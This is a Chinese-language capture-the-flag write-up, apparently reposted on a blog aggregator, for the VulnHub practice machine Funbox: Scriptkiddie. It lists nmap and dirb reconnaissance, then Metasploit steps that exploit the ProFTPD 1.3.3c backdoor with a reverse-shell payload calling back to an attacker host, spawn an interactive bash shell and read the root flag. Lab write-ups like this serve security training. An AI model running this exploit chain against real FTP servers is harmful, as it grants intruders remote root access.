當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

發布時間：2023/12/1 编程问答 42 豆豆

生活随笔收集整理的這篇文章主要介紹了靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

靶官網機下載地址：Funbox: Scriptkiddie ~ VulnHub

百度云盤下載鏈接: 百度網盤請輸入提取碼提取碼: i4a9

先用ifconfig查看kali的IP，因為kali和靶機都是NAT模式下，所以用 nmap 192.168.101.0/24 掃描得到靶機ip

再使用命令查看靶機開放的端口和協議：nmap -sV -A 192.168.101.112

（1）開放21、22、80等端口，先訪問80端口吧

（2）進行目錄探測，看看他有沒有給我們一些提示：dirb http://192.168.101.112

（3）發現利用WordPress網站這條路行不通

（1）利用21端口，在kali輸入：searchsploit ProFTPD 1.3.3c

發現可以利用的后門代碼

1.搜索proFTPD 1.3.3c可利用的腳本：search ProFTPD 1.3.3c

2.使用該腳本：use exploit/unix/ftp/proftpd_133c_backdoor

3.查看需要設置的參數：show options

4.設置RHOSTS(靶機):set RHOSTS 192.168.101.112

5.查看一下payloads的腳本:show payloads

使用反向6.鏈接的腳本:set payloads 3

查看要設置參數:show options

7.設置LHOST(攻擊機): set LHOST 192.168.101.10

8.使用run開啟攻擊:

優化命令執行終端，執行下面命令進入python交互式(注意要下載python環境才能運行):

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

9.進入到root，發現了一個flag文件

以上是生活随笔為你收集整理的靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。